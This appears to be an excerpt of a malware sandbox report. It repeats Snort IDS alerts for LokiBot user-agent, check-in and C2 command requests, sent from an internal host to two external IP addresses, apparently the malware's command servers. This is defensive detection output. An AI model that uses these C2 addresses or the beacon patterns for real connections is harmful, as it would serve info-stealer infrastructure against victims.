                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49792 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49792 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49793 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49793 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49793 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49794 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49794 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49794 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49795 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49795 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49795 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49796 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49796 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49796 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49797 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49797 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49797 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49798 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49798 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49798 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49799 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49799 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49799 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49800 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49800 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49800 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49801 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49801 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49801 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49802 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49802 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49802 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49803 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49803 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49803 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49804 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49804 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49804 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49805 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49805 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49805 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49806 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49806 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49806 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49807 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49807 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49807 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49808 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49808 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49808 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49809 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49809 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49809 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49810 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49810 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49810 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49811 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49811 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49811 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49812 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49812 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49812 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49813 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49813 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49813 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49814 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49814 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49814 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49815 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49815 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49815 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49816 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49816 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49816 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49817 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49817 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49817 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49818 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49818 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49818 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49819 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49819 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49819 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49820 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49820 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49820 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49821 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49821 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49821 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49822 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49822 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49822 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49823 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49823 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49823 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49824 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49824 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49824 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49825 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49825 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49825 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49826 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49826 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49826 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49827 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49827 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49827 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49828 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49828 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49828 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49829 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49829 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49829 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49831 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49831 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49831 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49832 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49832 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49832 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49833 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49833 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49833 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49835 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49835 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49835 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49836 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49836 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49836 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49837 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49837 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49837 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49838 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49838 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49838 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49839 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49839 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49839 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49840 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49840 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49840 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49841 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49841 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49841 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49842 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49842 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49842 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49843 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49843 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49843 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49844 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49844 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49844 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49845 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49845 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49845 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49846 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49846 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49846 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49847 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49847 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49847 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49848 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49848 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49848 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49849 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49849 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49849 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49850 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49850 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49850 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49851 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49851 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49851 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49852 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49852 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49852 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49853 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49853 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49853 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49854 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49854 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49854 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49855 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49855 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49855 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49856 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49856 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49856 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49857 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49857 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49857 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49858 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49858 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49858 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49859 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49859 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49859 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49860 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49860 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49860 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49861 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49861 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49861 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49862 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49862 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49862 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49863 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49863 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49863 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49864 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49864 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49864 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49865 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49865 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49865 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49866 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49866 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49866 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49867 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49867 -> 172.67.155.45:80
